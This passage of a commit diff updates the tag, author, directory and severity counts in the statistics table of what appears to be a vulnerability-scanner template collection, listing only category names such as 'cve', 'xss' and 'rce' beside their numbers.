gajbhiye","count":1},{"name":"omarjezi","count":1},{"name":"lethargynavigator","count":1},{"name":"tea","count":1},{"name":"hexcat","count":1},{"name":"tehtbl","count":1},{"name":"aravind","count":1},{"name":"booboohq","count":1},{"name":"nobody","count":1},{"name":"push4d","count":1},{"name":"jonathanwalker","count":1},{"name":"ringo","count":1},{"name":"j3ssie/geraldino2","count":1},{"name":"houdinis","count":1},{"name":"jeya.seelan","count":1},{"name":"mzack9999","count":1},{"name":"momen eldawakhly","count":1},{"name":"bjhulst","count":1},{"name":"philippdelteil","count":1},{"name":"jrolf","count":1},{"name":"wlayzz","count":1},{"name":"zsusac","count":1},{"name":"dali","count":1},{"name":"ahmetpergamum","count":1},{"name":"kagamigawa","count":1},{"name":"pudsec","count":1},{"name":"manasmbellani","count":1}],"directory":[{"name":"http","count":6462},{"name":"file","count":309},{"name":"workflows","count":191},{"name":"network","count":116},{"name":"ssl","count":26},{"name":"dns","count":17},{"name":"headless","count":9},{"name":"TEMPLATES-STATS.json","count":1},{"name":"contributors.json","count":1},{"name":"cves.json","count":1}],"severity":[{"name":"info","count":3225},{"name":"high","count":1346},{"name":"medium","count":1284},{"name":"critical","count":824},{"name":"low","count":231},{"name":"unknown","count":29}],"types":[{"name":"file","count":309},{"name":"dns","count":17}]}
diff --git a/TEMPLATES-STATS.md b/TEMPLATES-STATS.md
index aba5c36de7..b914a6c3ce 100644
--- a/TEMPLATES-STATS.md
+++ b/TEMPLATES-STATS.md
@@ -1,3696 +1,3750 @@
 |                       TAG                       | COUNT |                AUTHOR                 | COUNT |      DIRECTORY       | COUNT | SEVERITY | COUNT | TYPE | COUNT |
 |-------------------------------------------------|-------|---------------------------------------|-------|----------------------|-------|----------|-------|------|-------|
-| cve                                             |  2054 | dhiyaneshdk                           |  1056 | http                 |  6342 | info     |  3217 | file |   309 |
-| panel                                           |   985 | dwisiswant0                           |   798 | file                 |   309 | high     |  1288 | dns  |    17 |
-| wordpress                                       |   831 | daffainfo                             |   787 | workflows            |   191 | medium   |  1270 |      |       |
-| exposure                                        |   784 | pikpikcu                              |   353 | network              |   116 | critical |   785 |      |       |
-| xss                                             |   726 | pussycat0x                            |   289 | ssl                  |    26 | low      |   230 |      |       |
+| cve                                             |  2065 | dhiyaneshdk                           |  1059 | http                 |  6462 | info     |  3225 | file |   309 |
+| panel                                           |   988 | dwisiswant0                           |   798 | file                 |   309 | high     |  1346 | dns  |    17 |
+| wordpress                                       |   832 | daffainfo                             |   787 | workflows            |   191 | medium   |  1284 |      |       |
+| exposure                                        |   791 | pikpikcu                              |   353 | network              |   116 | critical |   824 |      |       |
+| xss                                             |   730 | pussycat0x                            |   291 | ssl                  |    26 | low      |   231 |      |       |
 | wp-plugin                                       |   721 | pdteam                                |   283 | dns                  |    17 | unknown  |    29 |      |       |
-| osint                                           |   672 | ritikchaddha                          |   259 | headless             |     9 |          |       |      |       |
+| osint                                           |   675 | ritikchaddha                          |   261 | headless             |     9 |          |       |      |       |
 | tech                                            |   632 | ricardomaia                           |   225 | TEMPLATES-STATS.json |     1 |          |       |      |       |
-| edb                                             |   598 | geeknik                               |   221 | cves.json            |     1 |          |       |      |       |
-| lfi                                             |   587 | theamanrawat                          |   179 | contributors.json    |     1 |          |       |      |       |
-| misconfig                                       |   509 | 0x_akoko                              |   179 |                      |       |          |       |      |       |
-| rce                                             |   467 | princechaddha                         |   161 |                      |       |          |       |      |       |
+| lfi                                             |   601 | geeknik                               |   221 | contributors.json    |     1 |          |       |      |       |
+| edb                                             |   598 | 0x_akoko                              |   179 | cves.json            |     1 |          |       |      |       |
+| misconfig                                       |   513 | theamanrawat                          |   179 |                      |       |          |       |      |       |
+| rce                                             |   489 | princechaddha                         |   161 |                      |       |          |       |      |       |
 | packetstorm                                     |   446 | gy741                                 |   147 |                      |       |          |       |      |       |
-| cve2021                                         |   442 | arafatansari                          |   119 |                      |       |          |       |      |       |
-| cve2022                                         |   430 | tess                                  |   109 |                      |       |          |       |      |       |
-| wpscan                                          |   382 | r3y3r53                               |    80 |                      |       |          |       |      |       |
-| wp                                              |   330 | madrobot                              |    65 |                      |       |          |       |      |       |
-| file                                            |   318 | zzeitlin                              |    64 |                      |       |          |       |      |       |
-| unauth                                          |   297 | idealphase                            |    63 |                      |       |          |       |      |       |
-| authenticated                                   |   253 | akincibor                             |    58 |                      |       |          |       |      |       |
+| cve2021                                         |   443 | sleepingbag945                        |   132 |                      |       |          |       |      |       |
+| cve2022                                         |   431 | arafatansari                          |   119 |                      |       |          |       |      |       |
+| wpscan                                          |   382 | tess                                  |   109 |                      |       |          |       |      |       |
+| wp                                              |   330 | r3y3r53                               |    80 |                      |       |          |       |      |       |
+| file                                            |   318 | madrobot                              |    65 |                      |       |          |       |      |       |
+| unauth                                          |   300 | zzeitlin                              |    64 |                      |       |          |       |      |       |
+| authenticated                                   |   254 | idealphase                            |    63 |                      |       |          |       |      |       |
+| sqli                                            |   253 | akincibor                             |    58 |                      |       |          |       |      |       |
 | cve2020                                         |   248 | for3stco1d                            |    55 |                      |       |          |       |      |       |
-| token-spray                                     |   241 | pdresearch                            |    48 |                      |       |          |       |      |       |
-| sqli                                            |   233 | righettod                             |    46 |                      |       |          |       |      |       |
-| kev                                             |   217 | gaurang                               |    42 |                      |       |          |       |      |       |
-| top-200                                         |   212 | philippedelteil                       |    42 |                      |       |          |       |      |       |
-| osint-social                                    |   210 | edoardottt                            |    41 |                      |       |          |       |      |       |
-| config                                          |   200 | iamnoooob                             |    37 |                      |       |          |       |      |       |
-|                                                 |   195 | c-sh0                                 |    35 |                      |       |          |       |      |       |
-| token                                           |   193 | rootxharsh                            |    34 |                      |       |          |       |      |       |
-| oast                                            |   183 | sleepingbag945                        |    33 |                      |       |          |       |      |       |
-| cve2023                                         |   174 | j4vaovo                               |    31 |                      |       |          |       |      |       |
-| intrusive                                       |   169 | adam crosser                          |    31 |                      |       |          |       |      |       |
-| login                                           |   162 | ice3man                               |    26 |                      |       |          |       |      |       |
-| default-login                                   |   161 | johnk3r                               |    26 |                      |       |          |       |      |       |
+| token-spray                                     |   241 | pdresearch                            |    49 |                      |       |          |       |      |       |
+| kev                                             |   218 | righettod                             |    47 |                      |       |          |       |      |       |
+| top-200                                         |   212 | philippedelteil                       |    45 |                      |       |          |       |      |       |
+| osint-social                                    |   210 | gaurang                               |    42 |                      |       |          |       |      |       |
+| config                                          |   201 | edoardottt                            |    41 |                      |       |          |       |      |       |
+|                                                 |   195 | iamnoooob                             |    38 |                      |       |          |       |      |       |
+| token                                           |   193 | rootxharsh                            |    35 |                      |       |          |       |      |       |
+| oast                                            |   187 | c-sh0                                 |    35 |                      |       |          |       |      |       |
+| intrusive                                       |   186 | adam crosser                          |    31 |                      |       |          |       |      |       |
+| cve2023                                         |   183 | j4vaovo                               |    31 |                      |       |          |       |      |       |
+| default-login                                   |   171 | ice3man                               |    26 |                      |       |          |       |      |       |
+| login                                           |   164 | johnk3r                               |    26 |                      |       |          |       |      |       |
 | iot                                             |   159 | pwnhxl                                |    25 |                      |       |          |       |      |       |
-| cve2018                                         |   157 | organiccrap                           |    24 |                      |       |          |       |      |       |
 | apache                                          |   157 | hardik-solanki                        |    24 |                      |       |          |       |      |       |
+| cve2018                                         |   157 | organiccrap                           |    24 |                      |       |          |       |      |       |
 | cve2019                                         |   156 | techbrunchfr                          |    23 |                      |       |          |       |      |       |
-| joomla                                          |   137 | harsh                                 |    22 |                      |       |          |       |      |       |
+| joomla                                          |   137 | harsh                                 |    23 |                      |       |          |       |      |       |
 | malware                                         |   131 | ffffffff0x                            |    22 |                      |       |          |       |      |       |
-| redirect                                        |   118 | ctflearner                            |    19 |                      |       |          |       |      |       |
-| detect                                          |   116 | sullo                                 |    18 |                      |       |          |       |      |       |
+| detect                                          |   118 | ctflearner                            |    19 |                      |       |          |       |      |       |
+| redirect                                        |   118 | sullo                                 |    18 |                      |       |          |       |      |       |
 | cve2010                                         |   112 | cckuailong                            |    18 |                      |       |          |       |      |       |
 | network                                         |   105 | parthmalhotra                         |    17 |                      |       |          |       |      |       |
+| auth-bypass                                     |   104 | random-robbie                         |    16 |                      |       |          |       |      |       |
 | files                                           |   104 | lu4nx                                 |    16 |                      |       |          |       |      |       |
-| ssrf                                            |   101 | random-robbie                         |    16 |                      |       |          |       |      |       |
-| top-100                                         |   100 | pr3r00t                               |    15 |                      |       |          |       |      |       |
-| auth-bypass                                     |    99 | sheikhrishad                          |    15 |                      |       |          |       |      |       |
-| router                                          |    99 | milo2012                              |    14 |                      |       |          |       |      |       |
-| cms                                             |    98 | tenbird                               |    14 |                      |       |          |       |      |       |
-| cve2017                                         |    80 | r3dg33k                               |    14 |                      |       |          |       |      |       |
-| disclosure                                      |    78 | 0ri2n                                 |    13 |                      |       |          |       |      |       |
-| devops                                          |    77 | nullfuzz                              |    13 |                      |       |          |       |      |       |
-| takeover                                        |    75 | theabhinavgaur                        |    13 |                      |       |          |       |      |       |
-| install                                         |    72 | sharath                               |    13 |                      |       |          |       |      |       |
-| seclists                                        |    70 | melbadry9                             |    13 |                      |       |          |       |      |       |
-| oracle                                          |    66 | suman_kar                             |    12 |                      |       |          |       |      |       |
-| oss                                             |    61 | dogasantos                            |    12 |                      |       |          |       |      |       |
-| fileupload                                      |    56 | wdahlenb                              |    11 |                      |       |          |       |      |       |
-| cisco                                           |    56 | 0xpugazh                              |    11 |                      |       |          |       |      |       |
-| cve2015                                         |    55 | cyllective                            |    11 |                      |       |          |       |      |       |
-| adobe                                           |    55 | elsfa7110                             |    11 |                      |       |          |       |      |       |
-| cve2016                                         |    54 | logicalhunter                         |    10 |                      |       |          |       |      |       |
-| google                                          |    53 | nadino                                |    10 |                      |       |          |       |      |       |
-| tokens                                          |    52 | meme-lord                             |    10 |                      |       |          |       |      |       |
-| atlassian                                       |    48 | hackergautam                          |    10 |                      |       |          |       |      |       |
-| logs                                            |    46 | random_robbie                         |    10 |                      |       |          |       |      |       |
-| tenable                                         |    46 | alph4byt3                             |    10 |                      |       |          |       |      |       |
-| huntr                                           |    45 | co5mos                                |    10 |                      |       |          |       |      |       |
-| osint-gaming                                    |    45 | olearycrew                            |     9 |                      |       |          |       |      |       |
+| router                                          |   101 | sheikhrishad                          |    15 |                      |       |          |       |      |       |
+| ssrf                                            |   101 | pr3r00t                               |    15 |                      |       |          |       |      |       |
+| top-100                                         |   100 | milo2012                              |    14 |                      |       |          |       |      |       |
+| cms                                             |    98 | r3dg33k                               |    14 |                      |       |          |       |      |       |
+| cve2017                                         |    80 | tenbird                               |    14 |                      |       |          |       |      |       |
+| disclosure                                      |    79 | nullfuzz                              |    13 |                      |       |          |       |      |       |
+| devops                                          |    77 | melbadry9                             |    13 |                      |       |          |       |      |       |
+| takeover                                        |    75 | 0ri2n                                 |    13 |                      |       |          |       |      |       |
+| install                                         |    72 | theabhinavgaur                        |    13 |                      |       |          |       |      |       |
+| seclists                                        |    70 | sharath                               |    13 |                      |       |          |       |      |       |
+| fileupload                                      |    69 | dogasantos                            |    12 |                      |       |          |       |      |       |
+| oracle                                          |    66 | meme-lord                             |    12 |                      |       |          |       |      |       |
+| oss                                             |    63 | suman_kar                             |    12 |                      |       |          |       |      |       |
+| cisco                                           |    56 | wdahlenb                              |    11 |                      |       |          |       |      |       |
+| cve2015                                         |    55 | 0xpugazh                              |    11 |                      |       |          |       |      |       |
+| adobe                                           |    55 | cyllective                            |    11 |                      |       |          |       |      |       |
+| cve2016                                         |    54 | elsfa7110                             |    11 |                      |       |          |       |      |       |
+| google                                          |    53 | hackergautam                          |    10 |                      |       |          |       |      |       |
+| tokens                                          |    52 | nadino                                |    10 |                      |       |          |       |      |       |
+| atlassian                                       |    48 | random_robbie                         |    10 |                      |       |          |       |      |       |
+| tenable                                         |    46 | logicalhunter                         |    10 |                      |       |          |       |      |       |
+| logs                                            |    46 | alph4byt3                             |    10 |                      |       |          |       |      |       |
+| osint-gaming                                    |    45 | co5mos                                |    10 |                      |       |          |       |      |       |
+| huntr                                           |    45 | fabaff                                |     9 |                      |       |          |       |      |       |
 | vmware                                          |    45 | oppsec                                |     9 |                      |       |          |       |      |       |
-| vulhub                                          |    44 | 0x240x23elu                           |     9 |                      |       |          |       |      |       |
-| aem                                             |    44 | emadshanab                            |     9 |                      |       |          |       |      |       |
 | debug                                           |    44 | momika233                             |     9 |                      |       |          |       |      |       |
-| hackerone                                       |    43 | fabaff                                |     9 |                      |       |          |       |      |       |
-| plugin                                          |    42 | veshraj                               |     8 |                      |       |          |       |      |       |
-| cve2014                                         |    42 | irshad ahamed                         |     8 |                      |       |          |       |      |       |
-| osint-hobby                                     |    42 | zh                                    |     8 |                      |       |          |       |      |       |
-| c2                                              |    42 | _0xf4n9x_                             |     8 |                      |       |          |       |      |       |
-| osint-porn                                      |    42 | aashiq                                |     8 |                      |       |          |       |      |       |
-| generic                                         |    41 | iamthefrogy                           |     8 |                      |       |          |       |      |       |
-| springboot                                      |    38 | that_juan_                            |     8 |                      |       |          |       |      |       |
-| traversal                                       |    37 | mastercho                             |     8 |                      |       |          |       |      |       |
-| jira                                            |    36 | kophjager007                          |     7 |                      |       |          |       |      |       |
-| listing                                         |    35 | randomstr1ng                          |     7 |                      |       |          |       |      |       |
-| injection                                       |    35 | noraj                                 |     7 |                      |       |          |       |      |       |
-| misc                                            |    35 | divya_mudgal                          |     7 |                      |       |          |       |      |       |
-| osint-misc                                      |    35 | techryptic (@tech)                    |     7 |                      |       |          |       |      |       |
-| kubernetes                                      |    35 | dr_set                                |     7 |                      |       |          |       |      |       |
-| aws                                             |    35 | harshbothra_                          |     7 |                      |       |          |       |      |       |
-| cnvd                                            |    34 | leovalcante                           |     7 |                      |       |          |       |      |       |
-| ir                                              |    33 | adamcrosser                           |     7 |                      |       |          |       |      |       |
-| deserialization                                 |    32 | its0x08                               |     7 |                      |       |          |       |      |       |
-| osint-coding                                    |    30 | me_dheeraj                            |     7 |                      |       |          |       |      |       |
+| vulhub                                          |    44 | olearycrew                            |     9 |                      |       |          |       |      |       |
+| aem                                             |    44 | 0x240x23elu                           |     9 |                      |       |          |       |      |       |
+| hackerone                                       |    43 | emadshanab                            |     9 |                      |       |          |       |      |       |
+| c2                                              |    43 | mastercho                             |     8 |                      |       |          |       |      |       |
+| cve2014                                         |    42 | that_juan_                            |     8 |                      |       |          |       |      |       |
+| osint-hobby                                     |    42 | iamthefrogy                           |     8 |                      |       |          |       |      |       |
+| plugin                                          |    42 | noraj                                 |     8 |                      |       |          |       |      |       |
+| osint-porn                                      |    42 | veshraj                               |     8 |                      |       |          |       |      |       |
+| generic                                         |    41 | zh                                    |     8 |                      |       |          |       |      |       |
+| springboot                                      |    39 | aashiq                                |     8 |                      |       |          |       |      |       |
+| oa                                              |    38 | irshad ahamed                         |     8 |                      |       |          |       |      |       |
+| traversal                                       |    38 | _0xf4n9x_                             |     8 |                      |       |          |       |      |       |
+| jira                                            |    36 | dr_set                                |     7 |                      |       |          |       |      |       |
+| cnvd                                            |    36 | kophjager007                          |     7 |                      |       |          |       |      |       |
+| aws                                             |    35 | techryptic (@tech)                    |     7 |                      |       |          |       |      |       |
+| misc                                            |    35 | randomstr1ng                          |     7 |                      |       |          |       |      |       |
+| injection                                       |    35 | divya_mudgal                          |     7 |                      |       |          |       |      |       |
+| kubernetes                                      |    35 | me_dheeraj                            |     7 |                      |       |          |       |      |       |
 |                                                 |       | (https://twitter.com/dheerajmadhukar) |       |                      |       |          |       |      |       |
-| php                                             |    29 | amit-jd                               |     7 |                      |       |          |       |      |       |
-| sap                                             |    29 | caspergn                              |     7 |                      |       |          |       |      |       |
-| log4j                                           |    29 | puzzlepeaches                         |     6 |                      |       |          |       |      |       |
-| fuzz                                            |    28 | nodauf                                |     6 |                      |       |          |       |      |       |
-| osint-tech                                      |    28 | pentest_swissky                       |     6 |                      |       |          |       |      |       |
-| gitlab                                          |    27 | pathtaga                              |     6 |                      |       |          |       |      |       |
-| api                                             |    27 | clem9669                              |     6 |                      |       |          |       |      |       |
-| cve2012                                         |    26 | evan rubinstein                       |     6 |                      |       |          |       |      |       |
-| microsoft                                       |    26 | justaacat                             |     6 |                      |       |          |       |      |       |
-| jndi                                            |    26 | imnightmaree                          |     6 |                      |       |          |       |      |       |
-| proxy                                           |    25 | gitlab red team                       |     6 |                      |       |          |       |      |       |
-| k8s                                             |    25 | forgedhallpass                        |     6 |                      |       |          |       |      |       |
-| osint-images                                    |    24 | praetorian-thendrickson               |     6 |                      |       |          |       |      |       |
-| firewall                                        |    24 | __fazal                               |     6 |                      |       |          |       |      |       |
-| osint-finance                                   |    24 | devang-solanki                        |     6 |                      |       |          |       |      |       |
-| osint-business                                  |    24 | xelkomy                               |     6 |                      |       |          |       |      |       |
-| manageengine                                    |    24 | ja1sh                                 |     6 |                      |       |          |       |      |       |
-| osint-shopping                                  |    24 | shine                                 |     5 |                      |       |          |       |      |       |
-| amazon                                          |    23 | mr-xn                                 |     5 |                      |       |          |       |      |       |
-| stored-xss                                      |    23 | kazet                                 |     5 |                      |       |          |       |      |       |
-| zoho                                            |    23 | yanyun                                |     5 |                      |       |          |       |      |       |
-| wp-theme                                        |    23 | s0obi                                 |     5 |                      |       |          |       |      |       |
-| keys                                            |    22 | podalirius                            |     5 |                      |       |          |       |      |       |
-| cloud                                           |    21 | panch0r3d                             |     5 |                      |       |          |       |      |       |
-| dlink                                           |    21 | prajiteshsingh                        |     5 |                      |       |          |       |      |       |
-| tomcat                                          |    21 | r12w4n                                |     5 |                      |       |          |       |      |       |
-| msf                                             |    21 | defr0ggy                              |     5 |                      |       |          |       |      |       |
-| weblogic                                        |    21 | kh4sh3i                               |     5 |                      |       |          |       |      |       |
-| ibm                                             |    21 | vicrack                               |     5 |                      |       |          |       |      |       |
-| cicd                                            |    20 | ganofins                              |     5 |                      |       |          |       |      |       |
-| fortinet                                        |    20 | robotshell                            |     5 |                      |       |          |       |      |       |
-| github                                          |    20 | bhutch                                |     5 |                      |       |          |       |      |       |
-| admin                                           |    20 | joanbono                              |     5 |                      |       |          |       |      |       |
-| camera                                          |    20 | r3naissance                           |     4 |                      |       |          |       |      |       |
-| ssl                                             |    20 | 3th1c_yuk1                            |     4 |                      |       |          |       |      |       |
-| dns                                             |    19 | megamansec                            |     4 |                      |       |          |       |      |       |
-| lfr                                             |    19 | lum8rjack                             |     4 |                      |       |          |       |      |       |
-| rukovoditel                                     |    19 | powerexploit                          |     4 |                      |       |          |       |      |       |
-| struts                                          |    19 | scent2d                               |     4 |                      |       |          |       |      |       |
-| jenkins                                         |    19 | dadevel                               |     4 |                      |       |          |       |      |       |
-| printer                                         |    18 | ggranjus                              |     4 |                      |       |          |       |      |       |
-| osint-music                                     |    18 | tanq16                                |     4 |                      |       |          |       |      |       |
-| ftp                                             |    18 | wisnupramoedya                        |     4 |                      |       |          |       |      |       |
+| deserialization                                 |    35 | caspergn                              |     7 |                      |       |          |       |      |       |
+| osint-misc                                      |    35 | amit-jd                               |     7 |                      |       |          |       |      |       |
+| listing                                         |    35 | adamcrosser                           |     7 |                      |       |          |       |      |       |
+| ir                                              |    33 | harshbothra_                          |     7 |                      |       |          |       |      |       |
+| osint-tech                                      |    31 | leovalcante                           |     7 |                      |       |          |       |      |       |
+| php                                             |    30 | its0x08                               |     7 |                      |       |          |       |      |       |
+| log4j                                           |    30 | nodauf                                |     6 |                      |       |          |       |      |       |
+| osint-coding                                    |    30 | pathtaga                              |     6 |                      |       |          |       |      |       |
+| sap                                             |    29 | gitlab red team                       |     6 |                      |       |          |       |      |       |
+| fuzz                                            |    28 | forgedhallpass                        |     6 |                      |       |          |       |      |       |
+| gitlab                                          |    28 | evan rubinstein                       |     6 |                      |       |          |       |      |       |
+| jndi                                            |    27 | xelkomy                               |     6 |                      |       |          |       |      |       |
+| api                                             |    27 | imnightmaree                          |     6 |                      |       |          |       |      |       |
+| k8s                                             |    26 | ja1sh                                 |     6 |                      |       |          |       |      |       |
+| microsoft                                       |    26 | pentest_swissky                       |     6 |                      |       |          |       |      |       |
+| cve2012                                         |    26 | devang-solanki                        |     6 |                      |       |          |       |      |       |
+| firewall                                        |    25 | praetorian-thendrickson               |     6 |                      |       |          |       |      |       |
+| proxy                                           |    25 | clem9669                              |     6 |                      |       |          |       |      |       |
+| wp-theme                                        |    24 | puzzlepeaches                         |     6 |                      |       |          |       |      |       |
+| osint-images                                    |    24 | justaacat                             |     6 |                      |       |          |       |      |       |
+| weaver                                          |    24 | __fazal                               |     6 |                      |       |          |       |      |       |
+| osint-shopping                                  |    24 | robotshell                            |     5 |                      |       |          |       |      |       |
+| osint-business                                  |    24 | yanyun                                |     5 |                      |       |          |       |      |       |
+| manageengine                                    |    24 | vicrack                               |     5 |                      |       |          |       |      |       |
+| osint-finance                                   |    24 | panch0r3d                             |     5 |                      |       |          |       |      |       |
+| zoho                                            |    23 | defr0ggy                              |     5 |                      |       |          |       |      |       |
+| stored-xss                                      |    23 | r12w4n                                |     5 |                      |       |          |       |      |       |
+| amazon                                          |    23 | bhutch                                |     5 |                      |       |          |       |      |       |
+| dlink                                           |    22 | prajiteshsingh                        |     5 |                      |       |          |       |      |       |
+| tomcat                                          |    22 | kh4sh3i                               |     5 |                      |       |          |       |      |       |
+| keys                                            |    22 | powerexploit                          |     5 |                      |       |          |       |      |       |
+| cloud                                           |    22 | joanbono                              |     5 |                      |       |          |       |      |       |
+| msf                                             |    21 | shine                                 |     5 |                      |       |          |       |      |       |
+| ecology                                         |    21 | kazet                                 |     5 |                      |       |          |       |      |       |
+| ibm                                             |    21 | podalirius                            |     5 |                      |       |          |       |      |       |
+| lfr                                             |    21 | s0obi                                 |     5 |                      |       |          |       |      |       |
+| weblogic                                        |    21 | mr-xn                                 |     5 |                      |       |          |       |      |       |
+| fortinet                                        |    20 | ganofins                              |     5 |                      |       |          |       |      |       |
+| xxe                                             |    20 | ggranjus                              |     4 |                      |       |          |       |      |       |
+| camera                                          |    20 | incogbyte                             |     4 |                      |       |          |       |      |       |
+| github                                          |    20 | megamansec                            |     4 |                      |       |          |       |      |       |
+| admin                                           |    20 | r3naissance                           |     4 |                      |       |          |       |      |       |
+| ssl                                             |    20 | tanq16                                |     4 |                      |       |          |       |      |       |
+| yonyou                                          |    20 | dadevel                               |     4 |                      |       |          |       |      |       |
+| cicd                                            |    20 | dolev farhi                           |     4 |                      |       |          |       |      |       |
+| dns                                             |    19 | h1ei1                                 |     4 |                      |       |          |       |      |       |
+| struts                                          |    19 | wisnupramoedya                        |     4 |                      |       |          |       |      |       |
+| rukovoditel                                     |    19 | lum8rjack                             |     4 |                      |       |          |       |      |       |
+| jenkins                                         |    19 | arm!tage                              |     4 |                      |       |          |       |      |       |
 | service                                         |    18 | e_schultze_                           |     4 |                      |       |          |       |      |       |
-| grafana                                         |    18 | dolev farhi                           |     4 |                      |       |          |       |      |       |
-| wavlink                                         |    18 | h1ei1                                 |     4 |                      |       |          |       |      |       |
-| nginx                                           |    17 | incogbyte                             |     4 |                      |       |          |       |      |       |
-| xxe                                             |    17 | arm!tage                              |     4 |                      |       |          |       |      |       |
-| cve2011                                         |    17 | sushantkamble                         |     3 |                      |       |          |       |      |       |
-| osint-blog                                      |    16 | ambassify                             |     3 |                      |       |          |       |      |       |
+| osint-music                                     |    18 | scent2d                               |     4 |                      |       |          |       |      |       |
+| printer                                         |    18 | 3th1c_yuk1                            |     4 |                      |       |          |       |      |       |
+| grafana                                         |    18 | sushantkamble                         |     3 |                      |       |          |       |      |       |
+| wavlink                                         |    18 | alifathi-h1                           |     3 |                      |       |          |       |      |       |
+| ftp                                             |    18 | unstabl3                              |     3 |                      |       |          |       |      |       |
+| cve2011                                         |    17 | mavericknerd                          |     3 |                      |       |          |       |      |       |
+| nginx                                           |    17 | _generic_human_                       |     3 |                      |       |          |       |      |       |
+| backup                                          |    16 | matt galligan                         |     3 |                      |       |          |       |      |       |
 | cve2009                                         |    16 | taielab                               |     3 |                      |       |          |       |      |       |
-| citrix                                          |    16 | dr0pd34d                              |     3 |                      |       |          |       |      |       |
-| backup                                          |    16 | unstabl3                              |     3 |                      |       |          |       |      |       |
-| status                                          |    15 | jarijaas                              |     3 |                      |       |          |       |      |       |
-| android                                         |    15 | f1tz                                  |     3 |                      |       |          |       |      |       |
-| magento                                         |    15 | whoever                               |     3 |                      |       |          |       |      |       |
-| cve2008                                         |    15 | bernardofsr                           |     3 |                      |       |          |       |      |       |
-| jarm                                            |    15 | m4lwhere                              |     3 |                      |       |          |       |      |       |
-| java                                            |    15 | arcc                                  |     3 |                      |       |          |       |      |       |
-| hp                                              |    15 | huowuzhao                             |     3 |                      |       |          |       |      |       |
-| confluence                                      |    14 | alifathi-h1                           |     3 |                      |       |          |       |      |       |
-| zyxel                                           |    14 | mavericknerd                          |     3 |                      |       |          |       |      |       |
-| audit                                           |    14 | fyoorer                               |     3 |                      |       |          |       |      |       |
-| npm                                             |    14 | true13                                |     3 |                      |       |          |       |      |       |
-| woocommerce                                     |    14 | me9187                                |     3 |                      |       |          |       |      |       |
-| osint-art                                       |    14 | ph33r                                 |     3 |                      |       |          |       |      |       |
-| nodejs                                          |    14 | dudez                                 |     3 |                      |       |          |       |      |       |
-| osint-health                                    |    14 | impramodsargar                        |     3 |                      |       |          |       |      |       |
-| mail                                            |    14 | fxploit                               |     3 |                      |       |          |       |      |       |
-| coldfusion                                      |    14 | matt galligan                         |     3 |                      |       |          |       |      |       |
-| enum                                            |    14 | johnjhacking                          |     3 |                      |       |          |       |      |       |
-| jboss                                           |    14 | vagnerd                               |     3 |                      |       |          |       |      |       |
-| cve2013                                         |    14 | shifacyclewala                        |     3 |                      |       |          |       |      |       |
-| cnvd2021                                        |    14 | _generic_human_                       |     3 |                      |       |          |       |      |       |
-| domainmod                                       |    14 | badboycxcc                            |     3 |                      |       |          |       |      |       |
-| cuppa                                           |    13 | nybble04                              |     3 |                      |       |          |       |      |       |
-| ruijie                                          |    13 | lucasljm2001                          |     3 |                      |       |          |       |      |       |
-| osint-political                                 |    13 | thomas_from_offensity                 |     3 |                      |       |          |       |      |       |
-| vpn                                             |    13 | huta0                                 |     3 |                      |       |          |       |      |       |
-| fortigate                                       |    13 | hahwul                                |     3 |                      |       |          |       |      |       |
-| abstractapi                                     |    13 | andydoering                           |     3 |                      |       |          |       |      |       |
-| osint-dating                                    |    13 | ekrause                               |     3 |                      |       |          |       |      |       |
-| login-check                                     |    13 | atomiczsec                            |     3 |                      |       |          |       |      |       |
-| bypass                                          |    13 | evergreencartoons                     |     3 |                      |       |          |       |      |       |
-| creds-stuffing                                  |    13 | k0pak4                                |     3 |                      |       |          |       |      |       |
-| airflow                                         |    13 | canberbamber                          |     3 |                      |       |          |       |      |       |
-| laravel                                         |    13 | yuzhe-zhang-0                         |     3 |                      |       |          |       |      |       |
-| azure                                           |    13 | binaryfigments                        |     3 |                      |       |          |       |      |       |
-| webserver                                       |    12 | swissky                               |     3 |                      |       |          |       |      |       |
-| netsweeper                                      |    12 | parth                                 |     3 |                      |       |          |       |      |       |
-| alibaba                                         |    12 | z3bd                                  |     3 |                      |       |          |       |      |       |
-| drupal                                          |    12 | imjust0                               |     3 |                      |       |          |       |      |       |
-| sonicwall                                       |    12 | emenalf                               |     3 |                      |       |          |       |      |       |
-| rails                                           |    12 | 0w4ys                                 |     3 |                      |       |          |       |      |       |
-| dell                                            |    12 | splint3r7                             |     3 |                      |       |          |       |      |       |
-| kafka                                           |    12 | davidmckennirey                       |     3 |                      |       |          |       |      |       |
-| git                                             |    12 | skeltavik                             |     3 |                      |       |          |       |      |       |
-| netgear                                         |    12 | vsh00t                                |     3 |                      |       |          |       |      |       |
-| graphql                                         |    12 | randomrobbie                          |     3 |                      |       |          |       |      |       |
-| microweber                                      |    12 | lark-lab                              |     3 |                      |       |          |       |      |       |
-| backdoor                                        |    12 | cheesymoon                            |     3 |                      |       |          |       |      |       |
-| zimbra                                          |    12 | yash anand @yashanand155              |     3 |                      |       |          |       |      |       |
-| dashboard                                       |    12 | clarkvoss                             |     2 |                      |       |          |       |      |       |
-| auth                                            |    12 | k11h-de                               |     2 |                      |       |          |       |      |       |
-| ruby                                            |    12 | sy3omda                               |     2 |                      |       |          |       |      |       |
-| setup                                           |    11 | mahendra purbia (mah3sec_)            |     2 |                      |       |          |       |      |       |
-| osint-video                                     |    11 | brenocss                              |     2 |                      |       |          |       |      |       |
-| ecology                                         |    11 | dbrwsky                               |     2 |                      |       |          |       |      |       |
-| docker                                          |    11 | cocxanh                               |     2 |                      |       |          |       |      |       |
-| online-fire-reporting                           |    11 | manas_harsh                           |     2 |                      |       |          |       |      |       |
-| spring                                          |    11 | d4vy                                  |     2 |                      |       |          |       |      |       |
-| xstream                                         |    11 | israel comazzetto dos reis            |     2 |                      |       |          |       |      |       |
-| phpmyadmin                                      |    11 | y4er                                  |     2 |                      |       |          |       |      |       |
-| django                                          |    10 | maximus decimus                       |     2 |                      |       |          |       |      |       |
-| jolokia                                         |    10 | 0xrudra                               |     2 |                      |       |          |       |      |       |
-| redis                                           |    10 | 0xsapra                               |     2 |                      |       |          |       |      |       |
-| symfony                                         |    10 | sascha brendel                        |     2 |                      |       |          |       |      |       |
-| node                                            |    10 | wa1tf0rme                             |     2 |                      |       |          |       |      |       |
-| digitalocean                                    |    10 | github.com/its0x08                    |     2 |                      |       |          |       |      |       |
-| ssh                                             |    10 | ricardo maia (brainfork)              |     2 |                      |       |          |       |      |       |
-| solarview                                       |    10 | brucelsone                            |     2 |                      |       |          |       |      |       |
-| ssti                                            |    10 | dahse89                               |     2 |                      |       |          |       |      |       |
-| glpi                                            |    10 | kishore-hariram                       |     2 |                      |       |          |       |      |       |
-| db                                              |    10 | hackerarpan                           |     2 |                      |       |          |       |      |       |
